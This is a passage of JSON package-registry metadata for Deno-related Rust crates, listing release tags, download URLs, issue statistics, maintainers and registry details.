deno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-23T10:14:52.862Z","dependent_packages_count":0,"downloads":1772,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":95.7596418936946,"dependent_repos_count":24.440162452198145,"dependent_packages_count":32.41514244211899,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":50.87164892933725},"purl":"pkg:cargo/lib_deno_resolver","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/lib_deno_resolver","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/lib_deno_resolver","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/lib_deno_resolver/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/lib_deno_resolver/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/lib_deno_resolver/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/lib_deno_resolver/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/lib_deno_resolver/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/lib_deno_resolver/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/lib_deno_resolver/codemeta","maintainers":[{"uuid":"300816","login":"carloslfu","name":"Carlos Galarza","email":null,"url":"https://github.com/carloslfu","packages_count":8,"html_url":"https://crates.io/users/carloslfu","role":null,"created_at":"2024-11-20T18:02:27.266Z","updated_at":"2024-11-20T18:02:27.266Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/carloslfu/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":11793916,"name":"deno_subprocess_windows","ecosystem":"cargo","description":"Subprocess API implementation for Windows","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":51,"first_release_published_at":"2025-06-12T12:49:58.463Z","latest_release_published_at":"2026-08-06T11:32:43.894Z","latest_release_number":"0.52.0","last_synced_at":"2026-08-29T21:58:00.321Z","created_at":"2025-06-12T13:01:19.743Z","updated_at":"2026-08-29T21:58:00.321Z","registry_url":"https://crates.io/crates/deno_subprocess_windows/","install_command":"cargo install deno_subprocess_windows","documentation_url":"https://docs.rs/deno_subprocess_windows/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/